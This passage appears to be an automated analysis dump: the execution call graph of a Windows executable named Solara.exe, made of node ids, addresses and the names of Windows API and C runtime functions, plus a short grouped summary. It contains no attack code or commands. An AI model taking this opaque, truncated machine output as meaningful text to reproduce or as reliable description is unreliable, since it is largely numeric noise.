LeaveCriticalSection 
20548->20550 19649 7ff75aebadd9 19652 7ff75aea54e8 LeaveCriticalSection 19649->19652 15918 7ff75aea99d1 15930 7ff75aeaa448 15918->15930 15935 7ff75aeab1c0 GetLastError 15930->15935 15936 7ff75aeab201 FlsSetValue 15935->15936 15937 7ff75aeab1e4 FlsGetValue 15935->15937 15939 7ff75aeab213 15936->15939 15940 7ff75aeab1f1 SetLastError 15936->15940 15938 7ff75aeab1fb 15937->15938 15937->15940 15938->15936 15966 7ff75aeaec08 15939->15966 15943 7ff75aeaa451 15940->15943 15944 7ff75aeab28d 15940->15944 15957 7ff75aeaa574 15943->15957 15946 7ff75aeaa574 __CxxCallCatchBlock 38 API calls 15944->15946 15949 7ff75aeab292 15946->15949 15947 7ff75aeab240 FlsSetValue 15951 7ff75aeab25e 15947->15951 15952 7ff75aeab24c FlsSetValue 15947->15952 15948 7ff75aeab230 FlsSetValue 15950 7ff75aeab239 15948->15950 15973 7ff75aeaa9b8 15950->15973 15979 7ff75aeaaf64 15951->15979 15952->15950 16027 7ff75aeb36c0 15957->16027 15971 7ff75aeaec19 _set_fmode 15966->15971 15967 7ff75aeaec6a 15987 7ff75aea4f78 15967->15987 15968 7ff75aeaec4e HeapAlloc 15969 7ff75aeab222 15968->15969 15968->15971 15969->15947 15969->15948 15971->15967 15971->15968 15984 7ff75aeb3600 15971->15984 15974 7ff75aeaa9bd RtlFreeHeap 15973->15974 15978 7ff75aeaa9ec 15973->15978 15975 7ff75aeaa9d8 GetLastError 15974->15975 15974->15978 15976 7ff75aeaa9e5 Concurrency::details::SchedulerProxy::DeleteThis 15975->15976 15977 7ff75aea4f78 _set_fmode 9 API calls 15976->15977 15977->15978 15978->15940 16013 7ff75aeaae3c 15979->16013 15990 7ff75aeb3640 15984->15990 15996 7ff75aeab338 GetLastError 15987->15996 15989 7ff75aea4f81 15989->15969 15995 7ff75aeb0348 EnterCriticalSection 15990->15995 15997 7ff75aeab379 FlsSetValue 15996->15997 16002 7ff75aeab35c 15996->16002 15998 7ff75aeab38b 15997->15998 16003 7ff75aeab369 15997->16003 16000 7ff75aeaec08 _set_fmode 5 API calls 15998->16000 15999 7ff75aeab3e5 SetLastError 15999->15989 16001 7ff75aeab39a 16000->16001 16004 7ff75aeab3b8 FlsSetValue 16001->16004 16005 7ff75aeab3a8 FlsSetValue 
16001->16005 16002->15997 16002->16003 16003->15999 16007 7ff75aeab3d6 16004->16007 16008 7ff75aeab3c4 FlsSetValue 16004->16008 16006 7ff75aeab3b1 16005->16006 16009 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16006->16009 16010 7ff75aeaaf64 _set_fmode 5 API calls 16007->16010 16008->16006 16009->16003 16011 7ff75aeab3de 16010->16011 16012 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16011->16012 16012->15999 16025 7ff75aeb0348 EnterCriticalSection 16013->16025 16061 7ff75aeb3678 16027->16061 16066 7ff75aeb0348 EnterCriticalSection 16061->16066 16131 7ff75ae9bb50 16132 7ff75ae9bb65 16131->16132 16133 7ff75ae9bb7e 16131->16133 16132->16133 16136 7ff75aead66c 16132->16136 16137 7ff75aead6b7 16136->16137 16142 7ff75aead67b _set_fmode 16136->16142 16139 7ff75aea4f78 _set_fmode 11 API calls 16137->16139 16138 7ff75aead69e HeapAlloc 16140 7ff75ae9bbde 16138->16140 16138->16142 16139->16140 16141 7ff75aeb3600 _set_fmode 2 API calls 16141->16142 16142->16137 16142->16138 16142->16141 20552 7ff75aebac53 20553 7ff75aebac63 20552->20553 20556 7ff75aea54e8 LeaveCriticalSection 20553->20556 19689 7ff75ae9cbc0 19690 7ff75ae9cbd0 19689->19690 19706 7ff75aea9c18 19690->19706 19692 7ff75ae9cbdc 19712 7ff75ae9ceb8 19692->19712 19694 7ff75ae9d19c 7 API calls 19696 7ff75ae9cc75 19694->19696 19695 7ff75ae9cbf4 _RTC_Initialize 19704 7ff75ae9cc49 19695->19704 19717 7ff75ae9d068 19695->19717 19698 7ff75ae9cc09 19720 7ff75aea9084 19698->19720 19704->19694 19705 7ff75ae9cc65 19704->19705 19707 7ff75aea9c29 19706->19707 19708 7ff75aea4f78 _set_fmode 11 API calls 19707->19708 19709 7ff75aea9c31 19707->19709 19710 7ff75aea9c40 19708->19710 19709->19692 19711 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 19710->19711 19711->19709 19713 7ff75ae9cec9 19712->19713 19716 7ff75ae9cece __scrt_acquire_startup_lock 19712->19716 19714 7ff75ae9d19c 7 API calls 19713->19714 19713->19716 19715 7ff75ae9cf42 19714->19715 19716->19695 19745 
7ff75ae9d02c 19717->19745 19719 7ff75ae9d071 19719->19698 19721 7ff75aea90a4 19720->19721 19735 7ff75ae9cc15 19720->19735 19722 7ff75aea90c2 GetModuleFileNameW 19721->19722 19723 7ff75aea90ac 19721->19723 19727 7ff75aea90ed 19722->19727 19724 7ff75aea4f78 _set_fmode 11 API calls 19723->19724 19725 7ff75aea90b1 19724->19725 19726 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 19725->19726 19726->19735 19760 7ff75aea9024 19727->19760 19730 7ff75aea9135 19731 7ff75aea4f78 _set_fmode 11 API calls 19730->19731 19732 7ff75aea913a 19731->19732 19733 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19732->19733 19733->19735 19734 7ff75aea914d 19737 7ff75aea919b 19734->19737 19739 7ff75aea91b4 19734->19739 19743 7ff75aea916f 19734->19743 19735->19704 19744 7ff75ae9d13c InitializeSListHead 19735->19744 19736 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19736->19735 19738 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19737->19738 19740 7ff75aea91a4 19738->19740 19741 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19739->19741 19742 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19740->19742 19741->19743 19742->19735 19743->19736 19746 7ff75ae9d046 19745->19746 19748 7ff75ae9d03f 19745->19748 19749 7ff75aeaa25c 19746->19749 19748->19719 19752 7ff75aea9e98 19749->19752 19759 7ff75aeb0348 EnterCriticalSection 19752->19759 19761 7ff75aea903c 19760->19761 19765 7ff75aea9074 19760->19765 19762 7ff75aeaec08 _set_fmode 11 API calls 19761->19762 19761->19765 19763 7ff75aea906a 19762->19763 19764 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19763->19764 19764->19765 19765->19730 19765->19734 19766 7ff75aea9dc0 19769 7ff75aea9d3c 19766->19769 19776 7ff75aeb0348 EnterCriticalSection 19769->19776 20557 7ff75aeab040 20558 7ff75aeab05a 20557->20558 20559 7ff75aeab045 20557->20559 20563 7ff75aeab060 20559->20563 20564 
7ff75aeab0a2 20563->20564 20565 7ff75aeab0aa 20563->20565 20566 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20564->20566 20567 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20565->20567 20566->20565 20568 7ff75aeab0b7 20567->20568 20569 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20568->20569 20570 7ff75aeab0c4 20569->20570 20571 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20570->20571 20572 7ff75aeab0d1 20571->20572 20573 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20572->20573 20574 7ff75aeab0de 20573->20574 20575 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20574->20575 20576 7ff75aeab0eb 20575->20576 20577 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20576->20577 20578 7ff75aeab0f8 20577->20578 20579 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20578->20579 20580 7ff75aeab105 20579->20580 20581 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20580->20581 20582 7ff75aeab115 20581->20582 20583 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20582->20583 20584 7ff75aeab125 20583->20584 20589 7ff75aeaaf04 20584->20589 20603 7ff75aeb0348 EnterCriticalSection 20589->20603 16390 7ff75aeb0938 16391 7ff75aeb095c 16390->16391 16394 7ff75aeb096c 16390->16394 16392 7ff75aea4f78 _set_fmode 11 API calls 16391->16392 16393 7ff75aeb0961 16392->16393 16395 7ff75aeb0c4c 16394->16395 16396 7ff75aeb098e 16394->16396 16397 7ff75aea4f78 _set_fmode 11 API calls 16395->16397 16398 7ff75aeb09af 16396->16398 16539 7ff75aeb0ff4 16396->16539 16399 7ff75aeb0c51 16397->16399 16402 7ff75aeb0a21 16398->16402 16403 7ff75aeb09d5 16398->16403 16419 7ff75aeb0a15 16398->16419 16401 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16399->16401 16401->16393 16405 7ff75aeaec08 
_set_fmode 11 API calls 16402->16405 16417 7ff75aeb09e4 16402->16417 16554 7ff75aea9730 16403->16554 16407 7ff75aeb0a37 16405->16407 16411 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16407->16411 16409 7ff75aeb0ace 16414 7ff75aeb0aeb 16409->16414 16420 7ff75aeb0b3d 16409->16420 16410 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16410->16393 16415 7ff75aeb0a45 16411->16415 16412 7ff75aeb09df 16416 7ff75aea4f78 _set_fmode 11 API calls 16412->16416 16413 7ff75aeb09fd 16413->16419 16422 7ff75aeb0ff4 45 API calls 16413->16422 16418 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16414->16418 16415->16417 16415->16419 16424 7ff75aeaec08 _set_fmode 11 API calls 16415->16424 16416->16417 16417->16410 16421 7ff75aeb0af4 16418->16421 16419->16409 16419->16417 16560 7ff75aeb719c 16419->16560 16420->16417 16423 7ff75aeb344c 40 API calls 16420->16423 16430 7ff75aeb0af9 16421->16430 16596 7ff75aeb344c 16421->16596 16422->16419 16425 7ff75aeb0b7a 16423->16425 16427 7ff75aeb0a67 16424->16427 16428 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16425->16428 16432 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16427->16432 16433 7ff75aeb0b84 16428->16433 16429 7ff75aeb0c40 16435 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16429->16435 16430->16429 16436 7ff75aeaec08 _set_fmode 11 API calls 16430->16436 16431 7ff75aeb0b25 16434 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16431->16434 16432->16419 16433->16417 16433->16430 16434->16430 16435->16393 16437 7ff75aeb0bc8 16436->16437 16438 7ff75aeb0bd0 16437->16438 16439 7ff75aeb0bd9 16437->16439 16440 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16438->16440 16521 7ff75aeaa514 16439->16521 16442 7ff75aeb0bd7 16440->16442 16447 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 
16442->16447 16444 7ff75aeb0bf0 16605 7ff75aeb72b4 16444->16605 16445 7ff75aeb0c7b 16446 7ff75aeaa970 _isindst 17 API calls 16445->16446 16449 7ff75aeb0c8f 16446->16449 16447->16393 16451 7ff75aeb0cb8 16449->16451 16459 7ff75aeb0cc8 16449->16459 16455 7ff75aea4f78 _set_fmode 11 API calls 16451->16455 16452 7ff75aeb0c17 16454 7ff75aea4f78 _set_fmode 11 API calls 16452->16454 16453 7ff75aeb0c38 16456 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16453->16456 16457 7ff75aeb0c1c 16454->16457 16483 7ff75aeb0cbd 16455->16483 16456->16429 16458 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16457->16458 16458->16442 16460 7ff75aeb0fab 16459->16460 16461 7ff75aeb0cea 16459->16461 16462 7ff75aea4f78 _set_fmode 11 API calls 16460->16462 16463 7ff75aeb0d07 16461->16463 16624 7ff75aeb10dc 16461->16624 16464 7ff75aeb0fb0 16462->16464 16467 7ff75aeb0d7b 16463->16467 16469 7ff75aeb0d2f 16463->16469 16473 7ff75aeb0d6f 16463->16473 16466 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16464->16466 16466->16483 16471 7ff75aeb0da3 16467->16471 16474 7ff75aeaec08 _set_fmode 11 API calls 16467->16474 16488 7ff75aeb0d3e 16467->16488 16468 7ff75aeb0e2e 16482 7ff75aeb0e4b 16468->16482 16489 7ff75aeb0e9e 16468->16489 16639 7ff75aea976c 16469->16639 16471->16473 16476 7ff75aeaec08 _set_fmode 11 API calls 16471->16476 16471->16488 16473->16468 16473->16488 16645 7ff75aeb705c 16473->16645 16478 7ff75aeb0d95 16474->16478 16481 7ff75aeb0dc5 16476->16481 16477 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16477->16483 16484 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16478->16484 16479 7ff75aeb0d39 16485 7ff75aea4f78 _set_fmode 11 API calls 16479->16485 16480 7ff75aeb0d57 16480->16473 16491 7ff75aeb10dc 45 API calls 16480->16491 16486 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16481->16486 16487 7ff75aeaa9b8 
Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16482->16487 16484->16471 16485->16488 16486->16473 16490 7ff75aeb0e54 16487->16490 16488->16477 16489->16488 16492 7ff75aeb344c 40 API calls 16489->16492 16494 7ff75aeb344c 40 API calls 16490->16494 16498 7ff75aeb0e5a 16490->16498 16491->16473 16493 7ff75aeb0edc 16492->16493 16495 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16493->16495 16496 7ff75aeb0e86 16494->16496 16499 7ff75aeb0ee6 16495->16499 16500 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16496->16500 16497 7ff75aeb0f9f 16501 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16497->16501 16498->16497 16502 7ff75aeaec08 _set_fmode 11 API calls 16498->16502 16499->16488 16499->16498 16500->16498 16501->16483 16503 7ff75aeb0f2b 16502->16503 16504 7ff75aeb0f33 16503->16504 16505 7ff75aeb0f3c 16503->16505 16506 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16504->16506 16530 7ff75aeb04e4 16505->16530 16508 7ff75aeb0f3a 16506->16508 16513 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16508->16513 16510 7ff75aeb0f52 SetEnvironmentVariableW 16514 7ff75aeb0f76 16510->16514 16515 7ff75aeb0f97 16510->16515 16511 7ff75aeb0fdf 16512 7ff75aeaa970 _isindst 17 API calls 16511->16512 16517 7ff75aeb0ff3 16512->16517 16513->16483 16516 7ff75aea4f78 _set_fmode 11 API calls 16514->16516 16518 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16515->16518 16519 7ff75aeb0f7b 16516->16519 16518->16497 16520 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16519->16520 16520->16508 16522 7ff75aeaa521 16521->16522 16523 7ff75aeaa52b 16521->16523 16522->16523 16528 7ff75aeaa546 16522->16528 16524 7ff75aea4f78 _set_fmode 11 API calls 16523->16524 16525 7ff75aeaa532 16524->16525 16526 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 16525->16526 16527 7ff75aeaa53e 16526->16527 
16527->16444 16527->16445 16528->16527 16529 7ff75aea4f78 _set_fmode 11 API calls 16528->16529 16529->16525 16531 7ff75aeb04f1 16530->16531 16532 7ff75aeb04fb 16530->16532 16531->16532 16537 7ff75aeb0517 16531->16537 16533 7ff75aea4f78 _set_fmode 11 API calls 16532->16533 16534 7ff75aeb0503 16533->16534 16535 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 16534->16535 16536 7ff75aeb050f 16535->16536 16536->16510 16536->16511 16537->16536 16538 7ff75aea4f78 _set_fmode 11 API calls 16537->16538 16538->16534 16540 7ff75aeb1029 16539->16540 16547 7ff75aeb1011 16539->16547 16541 7ff75aeaec08 _set_fmode 11 API calls 16540->16541 16542 7ff75aeb104d 16541->16542 16543 7ff75aeb10ae 16542->16543 16548 7ff75aeaec08 _set_fmode 11 API calls 16542->16548 16549 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16542->16549 16550 7ff75aeaa514 __std_exception_copy 37 API calls 16542->16550 16551 7ff75aeb10bd 16542->16551 16553 7ff75aeb10d2 16542->16553 16545 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16543->16545 16544 7ff75aeaa574 __CxxCallCatchBlock 45 API calls 16546 7ff75aeb10d8 16544->16546 16545->16547 16547->16398 16548->16542 16549->16542 16550->16542 16552 7ff75aeaa970 _isindst 17 API calls 16551->16552 16552->16553 16553->16544 16555 7ff75aea9740 16554->16555 16558 7ff75aea9749 16554->16558 16555->16558 16669 7ff75aea9208 16555->16669 16558->16412 16558->16413 16561 7ff75aeb62c4 16560->16561 16562 7ff75aeb71a9 16560->16562 16563 7ff75aeb62d1 16561->16563 16569 7ff75aeb6307 16561->16569 16564 7ff75aea4fbc 45 API calls 16562->16564 16566 7ff75aea4f78 _set_fmode 11 API calls 16563->16566 16577 7ff75aeb6278 16563->16577 16565 7ff75aeb71dd 16564->16565 16573 7ff75aeb71f3 16565->16573 16576 7ff75aeb71e2 16565->16576 16579 7ff75aeb720a 16565->16579 16570 7ff75aeb62db 16566->16570 16567 7ff75aeb6331 16568 7ff75aea4f78 _set_fmode 11 API calls 16567->16568 16572 7ff75aeb6336 16568->16572 16569->16567 16578 7ff75aeb6356 
Execution graph of Solara.exe (text carried by the rendered call graph; node ids and edge lists omitted). The basic blocks in the graph lie between 0x7ff75ae91000 and 0x7ff75aeba540.
Windows API calls named on graph nodes:
Environment and string handling: GetEnvironmentStringsW, FreeEnvironmentStringsW, GetEnvironmentVariableW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, MultiByteToWideChar, WideCharToMultiByte, CompareStringW, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage
CRT startup, heap, TLS and exception handling: IsProcessorFeaturePresent, GetStartupInfoW, GetModuleHandleW, GetModuleFileNameW, HeapSize, HeapReAlloc, FlsGetValue, FlsSetValue, TlsFree, EnterCriticalSection, DeleteCriticalSection, GetLastError, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
Library loading: SetDllDirectoryW, LoadLibraryExW, FreeLibrary, GetProcAddress
File system and process: FindFirstFileExW, FindClose, CreateFileW, GetFinalPathNameByHandleW, CloseHandle, GetTempPathW, GetCurrentProcessId, GetCurrentProcess, OpenProcessToken, LocalFree
UI and error reporting: FormatMessageW, MessageBoxW, PostMessageW, GetMessageW
CRT-internal symbols on the same nodes: _invalid_parameter_noinfo, _set_fmode, memcpy_s, _fread_nolock, _isindst, _log10_special, __CxxCallCatchBlock, __std_exception_copy, __std_exception_destroy, __crtLCMapStringW, __vcrt_FlsAlloc, __scrt_acquire_startup_lock, __scrt_release_startup_lock, __scrt_dllmain_crt_thread_attach, Concurrency::details::SchedulerProxy::DeleteThis
17799 7ff75aeaf910 _fread_nolock MultiByteToWideChar 17797->17799 17798->17697 17799->17798 17800->17798 17802 7ff75aea0c27 17801->17802 17808 7ff75aea0c16 17801->17808 17803 7ff75aead66c _fread_nolock 12 API calls 17802->17803 17802->17808 17804 7ff75aea0c54 17803->17804 17805 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17804->17805 17807 7ff75aea0c68 17804->17807 17805->17807 17806 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17806->17808 17807->17806 17809 7ff75aeae5e0 17808->17809 17810 7ff75aeae630 17809->17810 17811 7ff75aeae5fd 17809->17811 17810->17811 17813 7ff75aeae662 17810->17813 17812 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 17811->17812 17828 7ff75aea4311 17812->17828 17818 7ff75aeae775 17813->17818 17821 7ff75aeae6aa 17813->17821 17814 7ff75aeae867 17855 7ff75aeadacc 17814->17855 17816 7ff75aeae82d 17848 7ff75aeade64 17816->17848 17818->17814 17818->17816 17819 7ff75aeae7fc 17818->17819 17822 7ff75aeae7bf 17818->17822 17823 7ff75aeae7b5 17818->17823 17841 7ff75aeae144 17819->17841 17826 7ff75aeaa514 __std_exception_copy 37 API calls 17821->17826 17821->17828 17831 7ff75aeae374 17822->17831 17823->17816 17825 7ff75aeae7ba 17823->17825 17825->17819 17825->17822 17827 7ff75aeae762 17826->17827 17827->17828 17829 7ff75aeaa970 _isindst 17 API calls 17827->17829 17828->17744 17828->17745 17830 7ff75aeae8c4 17829->17830 17864 7ff75aeb411c 17831->17864 17835 7ff75aeae41c 17836 7ff75aeae420 17835->17836 17837 7ff75aeae471 17835->17837 17838 7ff75aeae43c 17835->17838 17836->17828 17917 7ff75aeadf60 17837->17917 17913 7ff75aeae21c 17838->17913 17842 7ff75aeb411c 38 API calls 17841->17842 17843 7ff75aeae18e 17842->17843 17844 7ff75aeb3b64 37 API calls 17843->17844 17845 7ff75aeae1de 17844->17845 17846 7ff75aeae1e2 17845->17846 17847 7ff75aeae21c 45 API calls 17845->17847 17846->17828 17847->17846 17849 7ff75aeb411c 38 API calls 17848->17849 17850 7ff75aeadeaf 17849->17850 17851 7ff75aeb3b64 
37 API calls 17850->17851 17852 7ff75aeadf07 17851->17852 17853 7ff75aeadf0b 17852->17853 17854 7ff75aeadf60 45 API calls 17852->17854 17853->17828 17854->17853 17856 7ff75aeadb11 17855->17856 17857 7ff75aeadb44 17855->17857 17858 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 17856->17858 17859 7ff75aeadb5c 17857->17859 17861 7ff75aeadbdd 17857->17861 17863 7ff75aeadb3d memcpy_s 17858->17863 17860 7ff75aeade64 46 API calls 17859->17860 17860->17863 17862 7ff75aea4830 45 API calls 17861->17862 17861->17863 17862->17863 17863->17828 17865 7ff75aeb416f fegetenv 17864->17865 17866 7ff75aeb7e9c 37 API calls 17865->17866 17871 7ff75aeb41c2 17866->17871 17867 7ff75aeb41ef 17870 7ff75aeaa514 __std_exception_copy 37 API calls 17867->17870 17868 7ff75aeb42b2 17869 7ff75aeb7e9c 37 API calls 17868->17869 17872 7ff75aeb42dc 17869->17872 17873 7ff75aeb426d 17870->17873 17871->17868 17874 7ff75aeb41dd 17871->17874 17875 7ff75aeb428c 17871->17875 17876 7ff75aeb7e9c 37 API calls 17872->17876 17877 7ff75aeb5394 17873->17877 17883 7ff75aeb4275 17873->17883 17874->17867 17874->17868 17878 7ff75aeaa514 __std_exception_copy 37 API calls 17875->17878 17879 7ff75aeb42ed 17876->17879 17880 7ff75aeaa970 _isindst 17 API calls 17877->17880 17878->17873 17881 7ff75aeb8090 20 API calls 17879->17881 17882 7ff75aeb53a9 17880->17882 17891 7ff75aeb4356 memcpy_s 17881->17891 17884 7ff75ae9c5c0 _log10_special 8 API calls 17883->17884 17885 7ff75aeae3c1 17884->17885 17909 7ff75aeb3b64 17885->17909 17886 7ff75aeb46ff memcpy_s 17887 7ff75aeb4a3f 17888 7ff75aeb3c80 37 API calls 17887->17888 17897 7ff75aeb5157 17888->17897 17889 7ff75aeb49eb 17889->17887 17892 7ff75aeb53ac memcpy_s 37 API calls 17889->17892 17890 7ff75aeb4397 memcpy_s 17896 7ff75aeb4cdb memcpy_s 17890->17896 17900 7ff75aeb47f3 memcpy_s 17890->17900 17891->17886 17891->17890 17893 7ff75aea4f78 _set_fmode 11 API calls 17891->17893 17892->17887 17895 7ff75aeb47d0 17893->17895 17894 7ff75aeb5338 17902 7ff75aeb7e9c 37 API calls 
17894->17902 17898 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 17895->17898 17896->17887 17896->17889 17901 7ff75aea4f78 11 API calls _set_fmode 17896->17901 17905 7ff75aeaa950 37 API calls _invalid_parameter_noinfo 17896->17905 17899 7ff75aeb53ac memcpy_s 37 API calls 17897->17899 17908 7ff75aeb51b2 17897->17908 17898->17890 17899->17908 17900->17889 17903 7ff75aea4f78 11 API calls _set_fmode 17900->17903 17906 7ff75aeaa950 37 API calls _invalid_parameter_noinfo 17900->17906 17901->17896 17902->17883 17903->17900 17904 7ff75aeb3c80 37 API calls 17904->17908 17905->17896 17906->17900 17907 7ff75aeb53ac memcpy_s 37 API calls 17907->17908 17908->17894 17908->17904 17908->17907 17910 7ff75aeb3b83 17909->17910 17911 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 17910->17911 17912 7ff75aeb3bae memcpy_s 17910->17912 17911->17912 17912->17835 17914 7ff75aeae248 memcpy_s 17913->17914 17915 7ff75aea4830 45 API calls 17914->17915 17916 7ff75aeae302 memcpy_s 17914->17916 17915->17916 17916->17836 17918 7ff75aeadf9b 17917->17918 17923 7ff75aeadfe8 memcpy_s 17917->17923 17919 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 17918->17919 17920 7ff75aeadfc7 17919->17920 17920->17836 17921 7ff75aeae053 17922 7ff75aeaa514 __std_exception_copy 37 API calls 17921->17922 17927 7ff75aeae095 memcpy_s 17922->17927 17923->17921 17924 7ff75aea4830 45 API calls 17923->17924 17924->17921 17925 7ff75aeaa970 _isindst 17 API calls 17926 7ff75aeae140 17925->17926 17927->17925 17929 7ff75aea0ccf 17928->17929 17934 7ff75aea0cbe 17928->17934 17930 7ff75aead66c _fread_nolock 12 API calls 17929->17930 17929->17934 17931 7ff75aea0d00 17930->17931 17932 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17931->17932 17935 7ff75aea0d14 17931->17935 17932->17935 17933 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17933->17934 17934->17764 17935->17933 17937 7ff75aea47d6 17936->17937 17939 7ff75aea47de 17936->17939 17938 7ff75aea4830 45 
API calls 17937->17938 17938->17939 17939->17774 17941 7ff75aeada41 17940->17941 17942 7ff75aea486f 17940->17942 17941->17942 17943 7ff75aeb3374 45 API calls 17941->17943 17944 7ff75aeada94 17942->17944 17943->17942 17945 7ff75aea487f 17944->17945 17946 7ff75aeadaad 17944->17946 17945->17697 17946->17945 17947 7ff75aeb26c0 45 API calls 17946->17947 17947->17945 17951 7ff75aeb6df8 17948->17951 17953 7ff75aeb6e5c 17951->17953 17952 7ff75ae9c5c0 _log10_special 8 API calls 17954 7ff75aeb012d 17952->17954 17953->17952 17954->17798 17956 7ff75aea107f 17955->17956 17957 7ff75aea106d 17955->17957 17959 7ff75aea108d 17956->17959 17964 7ff75aea10c9 17956->17964 17958 7ff75aea4f78 _set_fmode 11 API calls 17957->17958 17960 7ff75aea1072 17958->17960 17961 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 17959->17961 17962 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 17960->17962 17963 7ff75aea107d 17961->17963 17962->17963 17963->17662 17965 7ff75aea1445 17964->17965 17967 7ff75aea4f78 _set_fmode 11 API calls 17964->17967 17965->17963 17966 7ff75aea4f78 _set_fmode 11 API calls 17965->17966 17968 7ff75aea16d9 17966->17968 17969 7ff75aea143a 17967->17969 17971 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 17968->17971 17970 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 17969->17970 17970->17965 17971->17963 17973 7ff75aea0774 17972->17973 18000 7ff75aea04d4 17973->18000 17975 7ff75aea078d 17975->17315 18012 7ff75aea042c 17976->18012 17980 7ff75ae9c8c0 17979->17980 17981 7ff75ae92930 GetCurrentProcessId 17980->17981 17982 7ff75ae91c80 49 API calls 17981->17982 17983 7ff75ae92979 17982->17983 18026 7ff75aea49f4 17983->18026 17988 7ff75ae91c80 49 API calls 17989 7ff75ae929ff 17988->17989 18056 7ff75ae92620 17989->18056 17992 7ff75ae9c5c0 _log10_special 8 API calls 17993 7ff75ae92a31 17992->17993 17993->17354 17995 7ff75aea0189 17994->17995 17996 7ff75ae91b89 17994->17996 17997 7ff75aea4f78 _set_fmode 11 API calls 17995->17997 17996->17353 17996->17354 17998 
7ff75aea018e 17997->17998 17999 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 17998->17999 17999->17996 18001 7ff75aea053e 18000->18001 18002 7ff75aea04fe 18000->18002 18001->18002 18004 7ff75aea054a 18001->18004 18003 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 18002->18003 18005 7ff75aea0525 18003->18005 18011 7ff75aea54dc EnterCriticalSection 18004->18011 18005->17975 18013 7ff75aea0456 18012->18013 18024 7ff75ae91a20 18012->18024 18014 7ff75aea04a2 18013->18014 18015 7ff75aea0465 memcpy_s 18013->18015 18013->18024 18025 7ff75aea54dc EnterCriticalSection 18014->18025 18018 7ff75aea4f78 _set_fmode 11 API calls 18015->18018 18020 7ff75aea047a 18018->18020 18022 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 18020->18022 18022->18024 18024->17323 18024->17324 18030 7ff75aea4a4e 18026->18030 18027 